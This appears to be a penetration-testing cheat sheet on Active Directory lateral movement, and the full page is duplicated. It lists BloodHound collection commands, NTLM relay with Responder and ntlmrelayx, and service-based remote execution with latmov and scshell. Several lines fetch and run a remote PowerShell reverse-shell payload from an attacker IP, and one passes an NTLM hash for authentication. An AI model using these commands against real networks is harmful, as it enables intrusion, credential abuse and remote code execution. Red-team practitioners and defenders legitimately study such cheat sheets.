Lateral Movement

BloodHound

.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
.\SharpHound.exe -c all,GPOLocalGroup
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest

Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>

pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

Relay

cme smb --gen-relay-list smb_targets.txt 172.21.23.0/24
Responder -I tun0 -dw
ntlmrelayx.py -no-http-server -smb2support -t $IP 
-c 'cmd /c whoami'
or
-c "cmd /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/rev.ps1')"
or
-e payload.exe

Fileless Movement

$sess = New-PSSession -ComputerName <Name>
Copy-item -path C:\users\public\payload.ps1 -destination 'C:\users\public\payload.ps1' -tosession $sess

latmov.exe <server> SensorService "cmd.exe /c nc.exe 
latmov.exe <server> SenorService "cmd.exe /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/payload.ps1')"
or
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME:PASSWORD@ComputerIP
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME@ComputerIP -hashes 00000000000000000000000000000000:aec2214937bedcfa722c4123ca859423

PreviousCredentials NextDomain Reconnaissance on Kali

Last updated 1 year ago

Lateral Movement

BloodHound

.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
.\SharpHound.exe -c all,GPOLocalGroup
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest

Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
Invoke-BloodHound -CollectionMethod All  -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>

pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

Relay

cme smb --gen-relay-list smb_targets.txt 172.21.23.0/24
Responder -I tun0 -dw
ntlmrelayx.py -no-http-server -smb2support -t $IP 
-c 'cmd /c whoami'
or
-c "cmd /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/rev.ps1')"
or
-e payload.exe

Fileless Movement

$sess = New-PSSession -ComputerName <Name>
Copy-item -path C:\users\public\payload.ps1 -destination 'C:\users\public\payload.ps1' -tosession $sess

latmov.exe <server> SensorService "cmd.exe /c nc.exe 
latmov.exe <server> SenorService "cmd.exe /c powershell.exe iex(new-object net.webclient).downloadstring('http://172.21.23.27/payload.ps1')"
or
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME:PASSWORD@ComputerIP
proxychains python scshell.py -service-name Sensorservice DOMAIN/USERNAME@ComputerIP -hashes 00000000000000000000000000000000:aec2214937bedcfa722c4123ca859423

PreviousCredentials NextDomain Reconnaissance on Kali

Last updated 1 year ago